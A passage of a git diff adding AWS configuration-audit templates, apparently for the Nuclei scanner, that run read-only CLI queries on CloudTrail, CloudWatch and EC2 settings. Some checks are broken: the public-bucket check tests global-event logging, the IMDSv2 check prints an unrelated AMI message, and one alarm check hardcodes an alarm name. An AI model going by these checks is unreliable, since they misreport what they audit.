https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html + tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].IncludeGlobalServiceEvents' --output json + + matchers: + - type: word + words: + - "true" + + extractors: + - type: dsl + dsl: + - '"Ensure only one trail in Amazon CloudTrail is configured for global service events to avoid duplicates: " + trail' diff --git a/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml new file mode 100644 index 0000000000..45f449db75 --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-global-disabled.yaml @@ -0,0 +1,55 @@ +id: cloudtrail-global-disabled +info: + name: CloudTrail Global Events Enablement + author: princechaddha + severity: high + description: | + Ensure Amazon CloudTrail trails are configured to capture both regional and global API activity for enhanced security and compliance in your AWS account. + impact: | + Lacking global event logging reduces visibility across AWS services that operate at the global level, potentially missing critical security and compliance data. + remediation: | + Enable global service logging in CloudTrail by creating or updating a trail to include global services. This ensures comprehensive activity monitoring. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-create-and-update-a-trail.html + tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].IncludeGlobalServiceEvents' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"' diff --git a/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml new file mode 100644 index 0000000000..a8af247688 --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-integrated-cloudwatch.yaml @@ -0,0 +1,55 @@ +id: cloudtrail-integrated-cloudwatch +info: + name: CloudTrail CloudWatch Integration + author: princechaddha + severity: medium + description: | + Ensure Amazon CloudTrail logs are integrated with CloudWatch Logs for real-time monitoring and analysis. + impact: | + Without integration, detecting and responding to critical events or unauthorized actions within AWS environment could be delayed. + remediation: | + Enable CloudTrail log file validation and configure CloudWatch Logs to monitor CloudTrail log files. Create CloudWatch Alarms for specific events of interest. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/send-cloudtrail-events-to-cloudwatch-logs.html + tags: cloud,devops,aws,amazon,cloudtrail,cloudwatch,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].CloudWatchLogsLogGroupArn' + + matchers: + - type: word + words: + - "[]" + + extractors: + - type: dsl + dsl: + - '"CloudTrail trail" + trail + " is not configured to send events to CloudWatch Logs for monitoring purposes"' diff --git a/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml new file mode 100644 index 0000000000..34620d5e35 --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-log-integrity.yaml @@ -0,0 +1,55 @@ +id: cloudtrail-log-integrity +info: + name: CloudTrail Log Integrity Validation not Enabled + author: princechaddha + severity: high + description: | + Ensure CloudTrail log file integrity validation is enabled to detect unauthorized file modifications. + impact: | + Without log file integrity validation, it's harder to detect if CloudTrail logs have been tampered with, potentially hiding malicious activity. + remediation: | + Enable log file integrity validation on all CloudTrail trails to ensure the integrity and authenticity of your logs. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html + tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].LogFileValidationEnabled' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"The log file integrity validation is not enabled for CloudTrail trail" + trail' diff --git a/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml new file mode 100644 index 0000000000..9c8c8a57de --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-logs-not-encrypted.yaml @@ -0,0 +1,55 @@ +id: cloudtrail-logs-not-encrypted +info: + name: CloudTrail Logs Not Encrypted + author: princechaddha + severity: medium + description: | + Ensure Amazon CloudTrail logs are encrypted at rest using AWS Key Management Service (KMS) to secure log data. + impact: | + Non-encrypted CloudTrail logs pose a risk of unauthorized access, compromising the integrity and confidentiality of log data. + remediation: | + Enable Server-Side Encryption (SSE) for CloudTrail logs using an AWS KMS key through the CloudTrail console or AWS CLI. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/encrypting-cloudtrail-log-files-with-aws-kms.html + tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].KmsKeyId' + + matchers: + - type: word + words: + - "[]" + + extractors: + - type: dsl + dsl: + - '"CloudTrail trail" + trail + " is not configured to encrypt log files using SSE-KMS encryption"' diff --git a/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml new file mode 100644 index 0000000000..be843d5ead --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-mfa-delete.yaml @@ -0,0 +1,72 @@ +id: cloudtrail-mfa-delete +info: + name: CloudTrail MFA Delete + author: princechaddha + severity: high + description: | + Ensure Amazon CloudTrail buckets have MFA Delete enabled to protect log file deletion. + impact: | + Prevents unauthorized deletion of CloudTrail logs, enhancing security and compliance. + remediation: | + Enable MFA Delete on CloudTrail buckets via the S3 console or AWS CLI. + reference: + - https://docs.aws.amazon.com/AmazonS3/latest/userguide/MultiFactorAuthenticationDelete.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + for(let BucketNames of iterate(template.buckets)){ + set("bucket", BucketNames) + code(3) + } + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].S3BucketName' + + extractors: + - type: json + name: buckets + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-versioning --bucket $bucket --query 'MFADelete' + + matchers: + - type: word + words: + - 'null' + + extractors: + - type: dsl + dsl: + - '"The MFA Delete feature is not enabled for the S3 bucket " + bucket + " associated with the CloudTrail " + trail' diff --git a/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml new file mode 100644 index 0000000000..3802e9c2f2 --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-mgmt-events.yaml @@ -0,0 +1,56 @@ +id: cloudtrail-mgmt-events +info: + name: CloudTrail Management Events Logging Not Enabled + author: princechaddha + severity: medium + description: | + Ensures Amazon CloudTrail trails are configured to log management events, capturing crucial API calls and console actions for security and audit purposes. + impact: | + Failure to log management events can lead to insufficient audit trails, hindering the ability to investigate and respond to suspicious activities. + remediation: | + Enable management event logging in CloudTrail by creating a new trail or updating existing trails to include management events. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/logging-management-and-data-events-with-cloudtrail.html + tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config + + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail get-event-selectors --region $region --trail-name $trail --query 'EventSelectors[*].IncludeManagementEvents' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"CloudTrail trail" + trail + " is not configured to capture management operations performed on your AWS cloud resources"' diff --git a/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml new file mode 100644 index 0000000000..8aa86677c9 --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-public-buckets.yaml @@ -0,0 +1,55 @@ +id: cloudtrail-public-buckets +info: + name: Public CloudTrail Buckets + author: princechaddha + severity: critical + description: | + Identifies AWS CloudTrail S3 buckets that are publicly accessible, risking exposure of sensitive log data. + impact: | + Unauthorized access to CloudTrail logs can lead to data leakage, compromising the integrity and confidentiality of cloud operations. + remediation: | + Restrict S3 bucket access using bucket policies or IAM policies to ensure that CloudTrail logs are not publicly accessible. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-find-log-files.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].IncludeGlobalServiceEvents' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"CloudTrail trail" + trail + " is not configured to record API calls for AWS global services"' diff --git a/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml new file mode 100644 index 0000000000..61e1cd7821 --- /dev/null +++ b/cloud/aws/cloudtrail/cloudtrail-s3-bucket-logging.yaml @@ -0,0 +1,72 @@ +id: cloudtrail-s3-bucket-logging +info: + name: CloudTrail S3 Logging + author: princechaddha + severity: high + description: | + Ensure AWS CloudTrail logs are captured in S3 buckets with Server Access Logging enabled for audit and forensic purposes. + impact: | + Without S3 Server Access Logging for CloudTrail, tracking unauthorized access or modifications to CloudTrail logs becomes difficult, impacting incident response and forensic analysis. + remediation: | + Enable Server Access Logging on the S3 bucket used by CloudTrail. Configure the logging feature to capture all requests made to the CloudTrail bucket. + reference: + - https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-log-file-validation-intro.html + tags: cloud,devops,aws,amazon,s3,cloudtrail,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + for(let BucketNames of iterate(template.buckets)){ + set("bucket", BucketNames) + code(3) + } + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].S3BucketName' + + extractors: + - type: json + name: buckets + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-bucket-logging --bucket $bucket --query 'LoggingEnabled' + + matchers: + - type: word + words: + - 'null' + + extractors: + - type: dsl + dsl: + - '"Access logging is not enabled for the S3 bucket associated with CloudTrail trail " + trail' diff --git a/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml new file mode 100644 index 0000000000..d3f2a0c2ea --- /dev/null +++ b/cloud/aws/cloudtrail/s3-object-lock-not-enabled.yaml @@ -0,0 +1,73 @@ +id: s3-object-lock-not-enabled +info: + name: CloudTrail S3 Object Lock + author: princechaddha + severity: medium + description: | + Ensure Amazon CloudTrail S3 buckets have Object Lock enabled to prevent log deletion and ensure regulatory compliance. + impact: | + Without Object Lock, S3 objects such as CloudTrail logs can be deleted, compromising audit trails and violating compliance requirements. + remediation: | + Enable S3 Object Lock in Governance mode with a retention period that meets your compliance requirements for CloudTrail S3 buckets. + reference: + - https://docs.aws.amazon.com/AmazonS3/latest/dev/object-lock-overview.html + tags: cloud,devops,aws,amazon,s3,aws-cloud-config + +variables: + region: "ap-south-1" + +flow: | + code(1) + for(let CloudTrail of iterate(template.cloudtrailname)){ + set("trail", CloudTrail) + code(2) + for(let BucketNames of iterate(template.buckets)){ + set("bucket", BucketNames) + code(3) + } + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudtrail list-trails --region $region --query 'Trails[*].Name' --output json + + extractors: + - type: json + name: cloudtrailname + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudtrail describe-trails --region $region --trail-name-list $trail --query 'trailList[*].S3BucketName' + + extractors: + - type: json + name: buckets + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws s3api get-object-lock-configuration --bucket $bucket --query 'ObjectLockConfiguration.ObjectLockEnabled' --output json + + matchers: + - type: word + part: code_3_stderr + words: + - 'ObjectLockConfigurationNotFoundError' + + extractors: + - type: dsl + dsl: + - '"The Object Lock feature is not enabled for the S3 bucket associated with the CloudTrail trail " + trail' diff --git a/cloud/aws/cloudwatch/cw-alarm-action-set.yaml b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml new file mode 100644 index 0000000000..efc9744ec1 --- /dev/null +++ b/cloud/aws/cloudwatch/cw-alarm-action-set.yaml @@ -0,0 +1,55 @@ +id: cw-alarm-action-set +info: + name: CloudWatch Alarm Action Not Set + author: princechaddha + severity: medium + description: | + Ensure Amazon CloudWatch alarms have actions configured for the ALARM state to automate response to incidents. + impact: | + Without actions, CloudWatch alarms may not trigger automated incident response or notifications, potentially delaying mitigation. + remediation: | + Configure at least one action for each CloudWatch alarm to ensure timely response to monitored issues. + reference: + - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html + tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let AlarmName of iterate(template.alarms)){ + set("alarm", AlarmName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudwatch describe-alarms --region $region --query 'MetricAlarms[].AlarmName' --output json + + extractors: + - type: json + name: alarms + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudwatch describe-alarms --region $region --alarm-names "$alarm" --query 'MetricAlarms[*].AlarmActions[]' --output json + + matchers: + - type: word + words: + - "[]" + + extractors: + - type: dsl + dsl: + - '"The Amazon CloudWatch " + alarm +" is not configured with any actions for the ALARM state."' diff --git a/cloud/aws/cloudwatch/cw-alarms-actions.yaml b/cloud/aws/cloudwatch/cw-alarms-actions.yaml new file mode 100644 index 0000000000..411aa8202c --- /dev/null +++ b/cloud/aws/cloudwatch/cw-alarms-actions.yaml @@ -0,0 +1,55 @@ +id: cw-alarms-actions +info: + name: CloudWatch Alarms Actions Enabled + author: princechaddha + severity: high + description: | + Ensure that all Amazon CloudWatch alarms have actions enabled (ActionEnabled: true) to respond to state changes. + impact: | + Without actions enabled, CloudWatch alarms cannot perform automated actions in response to state changes, potentially missing critical alerts. + remediation: | + Enable actions for each CloudWatch alarm by setting the ActionEnabled parameter to true, allowing for automated responses to alarms. + reference: + - https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/AlarmThatSendsEmail.html + tags: cloud,devops,aws,amazon,cloudwatch,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let AlarmName of iterate(template.alarms)){ + set("alarm", AlarmName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws cloudwatch describe-alarms --region $region --query 'MetricAlarms[].AlarmName' --output json + + extractors: + - type: json + name: alarms + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws cloudwatch describe-alarms --region $region --alarm-names "DiskWritesOpsAlarm" --query 'MetricAlarms[*].ActionsEnabled' + + matchers: + - type: word + words: + - "false" + + extractors: + - type: dsl + dsl: + - '"The Amazon CloudWatch " + alarm + " does not have any active actions configured"' diff --git a/cloud/aws/ec2/ec2-imdsv2.yaml b/cloud/aws/ec2/ec2-imdsv2.yaml new file mode 100644 index 0000000000..c0376b38cc --- /dev/null +++ b/cloud/aws/ec2/ec2-imdsv2.yaml @@ -0,0 +1,55 @@ +id: ec2-imdsv2 +info: + name: Enforce IMDSv2 on EC2 Instances + author: princechaddha + severity: medium + description: | + Ensure all EC2 instances use Instance Metadata Service Version 2 (IMDSv2) for enhanced security when requesting instance metadata, protecting against certain types of attacks that target the older version, IMDSv1. + impact: | + Using IMDSv1 can expose EC2 instances to server-side request forgery (SSRF) attacks, potentially allowing attackers to access sensitive instance metadata. + remediation: | + Modify the EC2 instance metadata options to set `HttpTokens` to `required`, enforcing the use of IMDSv2. This can be done via the AWS Management Console, CLI, or EC2 API. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let InstancesName of iterate(template.instances)){ + set("ec2instance", InstancesName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-instances --region $region --output table --query 'Reservations[*].Instances[*].InstanceId' --output json + + extractors: + - type: json + name: instances + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-instances --region $region --instance-ids $ec2instance --query 'Reservations[*].Instances[*].MetadataOptions.HttpTokens[]' + matchers: + - type: word + words: + - "optional" + + extractors: + - type: dsl + dsl: + - 'ami + " is publically shared"' diff --git a/cloud/aws/ec2/ec2-public-ip.yaml b/cloud/aws/ec2/ec2-public-ip.yaml new file mode 100644 index 0000000000..adb57df74b --- /dev/null +++ b/cloud/aws/ec2/ec2-public-ip.yaml @@ -0,0 +1,55 @@ +id: ec2-public-ip +info: + name: Public IP on EC2 Instances + author: princechaddha + severity: unknown + description: | + Ensures Amazon EC2 instances, especially backend ones, do not use public IP addresses to minimize Internet exposure. + impact: | + Instances with public IP addresses are more vulnerable to Internet-based threats, compromising network security. + remediation: | + Restrict public IP assignment for EC2 instances, particularly for backend instances. Use private IPs and manage access via AWS VPC and security groups. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-instance-addressing.html#concepts-public-addresses + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let InstancesName of iterate(template.instances)){ + set("ec2instance", InstancesName) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-instances --region $region --output json --query 'Reservations[*].Instances[*].InstanceId' + + extractors: + - type: json + name: instances + internal: true + json: + - '.[].[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-instances --region $region --instance-ids $ec2instance --query "Reservations[*].Instances[*].NetworkInterfaces[*].Association.IpOwnerId[] | []" + + matchers: + - type: word + words: + - "amazon" + + extractors: + - type: dsl + dsl: + - '"The Amazon Instance " + ec2instance + " uses public IP addresses"' diff --git a/cloud/aws/ec2/ec2-sg-egress-open.yaml b/cloud/aws/ec2/ec2-sg-egress-open.yaml new file mode 100644 index 0000000000..e5eb85abfc --- /dev/null +++ b/cloud/aws/ec2/ec2-sg-egress-open.yaml @@ -0,0 +1,56 @@ +id: ec2-sg-egress-open +info: + name: Open Egress in EC2 Security Group + author: princechaddha + severity: high + description: | + Checks for unrestricted outbound/egress rules in Amazon EC2 security groups, highlighting potential over-permissive configurations. + impact: | + Allows unrestricted outbound traffic from EC2 instances, increasing the risk of data exfiltration and malicious external communications. + remediation: | + Restrict egress traffic in EC2 security groups to only necessary IP addresses and ranges, adhering to the Principle of Least Privilege. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html#sg-rules + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let SecurityGroup of iterate(template.securitygroups)){ + set("groupid", SecurityGroup) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroups + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --group-ids $groupid --query 'SecurityGroups[*].IpPermissionsEgress[]' + + matchers: + - type: word + words: + - "0.0.0.0/0" + - "::/0" + + extractors: + - type: dsl + dsl: + - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted outbound traffic"' diff --git a/cloud/aws/ec2/ec2-sg-ingress.yaml b/cloud/aws/ec2/ec2-sg-ingress.yaml new file mode 100644 index 0000000000..e53408c87b --- /dev/null +++ b/cloud/aws/ec2/ec2-sg-ingress.yaml @@ -0,0 +1,56 @@ +id: ec2-sg-ingress +info: + name: Unrestricted Access on Uncommon EC2 Ports + author: princechaddha + severity: high + description: | + Ensure Amazon EC2 security groups do not allow unrestricted access (0.0.0.0/0, ::/0) on uncommon ports, protecting against brute force attacks on EC2 instances. + impact: | + Unrestricted ingress on uncommon ports increases the risk of unauthorized access and potential brute force attacks on EC2 instances. + remediation: | + Restrict access to uncommon ports in EC2 security groups, permitting only necessary traffic and implementing stringent access controls. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/security-group-rules-reference.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +flow: | + code(1) + for(let SecurityGroup of iterate(template.securitygroups)){ + set("groupid", SecurityGroup) + code(2) + } + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroups + internal: true + json: + - '.[]' + + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --group-ids $groupid --query 'SecurityGroups[*].IpPermissions[]' + + matchers: + - type: word + words: + - "0.0.0.0/0" + - "::/0" + + extractors: + - type: dsl + dsl: + - '"Amazon EC2 security group(s) " + groupid + " allows unrestricted inbound traffic"' diff --git a/cloud/aws/ec2/ec2-unrestricted-cifs.yaml b/cloud/aws/ec2/ec2-unrestricted-cifs.yaml new file mode 100644 index 0000000000..a15b72f7a8 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-cifs.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-cifs +info: + name: EC2 Unrestricted CIFS Access + author: princechaddha + severity: critical + description: | + Checks for inbound rules in Amazon EC2 security groups allowing unrestricted access (0.0.0.0/0 or ::/0) on TCP port 445, used for CIFS/SMB file sharing, posing a high security risk. + impact: | + Unrestricted CIFS access can expose EC2 instances to unwanted external access, increasing the risk of data breaches and unauthorized control over resources. + remediation: | + Restrict inbound access on TCP port 445 to known IPs or ranges. Regularly review security group configurations to ensure compliance with security policies. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=445 Name=ip-permission.to-port,Values=445 Name=ip-permission.cidr,Values='0.0.0.0/0' Name=ip-permission.ipv6-cidr,Values='::/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 445"' diff --git a/cloud/aws/ec2/ec2-unrestricted-dns.yaml b/cloud/aws/ec2/ec2-unrestricted-dns.yaml new file mode 100644 index 0000000000..2ccc1dd1c7 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-dns.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-dns +info: + name: Unrestricted DNS Access in EC2 + author: princechaddha + severity: critical + description: | + Checks for inbound rules in Amazon EC2 security groups that allow unrestricted access (0.0.0.0/0 or ::/0) on TCP/UDP port 53, which can expose DNS servers to potential attacks. + impact: | + Allowing unrestricted access to DNS services can lead to DNS spoofing, DDoS attacks, and unauthorized access to internal networks. + remediation: | + Restrict the inbound rules for TCP/UDP port 53 in EC2 security groups to known, trusted IPs only. Ensure security group rules are tightly controlled and monitored. + reference: + - https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html#SecurityGroupRules + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=53 Name=ip-permission.to-port,Values=53 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 53"' diff --git a/cloud/aws/ec2/ec2-unrestricted-ftp.yaml b/cloud/aws/ec2/ec2-unrestricted-ftp.yaml new file mode 100644 index 0000000000..85856d6d37 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-ftp.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-ftp +info: + name: Restrict EC2 FTP Access + author: princechaddha + severity: critical + description: | + Ensure Amazon EC2 security groups disallow unrestricted inbound FTP access on TCP ports 20 and 21 to prevent brute force attacks. + impact: | + Unrestricted FTP access can expose EC2 instances to unauthorized access and brute force attacks, compromising security. + remediation: | + Restrict inbound access on TCP ports 20 and 21 for EC2 security groups to known IPs or remove the rules if FTP is not required. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/using-network-security.html#security-group-rules + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=20,21 Name=ip-permission.to-port,Values=20,21 Name=ip-permission.cidr,Values='0.0.0.0/0' --output json --query 'SecurityGroups[*].GroupId' + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 20 or 21"' diff --git a/cloud/aws/ec2/ec2-unrestricted-http.yaml b/cloud/aws/ec2/ec2-unrestricted-http.yaml new file mode 100644 index 0000000000..f37a2f9185 --- /dev/null +++ b/cloud/aws/ec2/ec2-unrestricted-http.yaml @@ -0,0 +1,36 @@ +id: ec2-unrestricted-http +info: + name: Unrestricted HTTP on EC2 + author: princechaddha + severity: critical + description: | + Checks for inbound rules in EC2 security groups allowing unrestricted access (0.0.0.0/0) to TCP port 80, increasing exposure to potential breaches. + impact: | + Unrestricted access to TCP port 80 can lead to unauthorized data exposure and increases the risk of security breaches. + remediation: | + Restrict inbound traffic on TCP port 80 to only necessary IP addresses, adhering to the principle of least privilege. + reference: + - https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-security-groups.html + tags: cloud,devops,aws,amazon,ec2,aws-cloud-config + +variables: + region: "us-east-1" + +self-contained: true +code: + - engine: + - sh + - bash + source: | + aws ec2 describe-security-groups --region $region --filters Name=ip-permission.from-port,Values=80 Name=ip-permission.to-port,Values=80 Name=ip-permission.cidr,Values='0.0.0.0/0' --query 'SecurityGroups[*].GroupId' --output json + + extractors: + - type: json + name: securitygroup + internal: true + json: + - '.[]' + + - type: dsl + dsl: + - 'securitygroup + " security group(s) alows unrestricted access (0.0.0.0/0 or ::/0) on TCP port 80"' diff --git 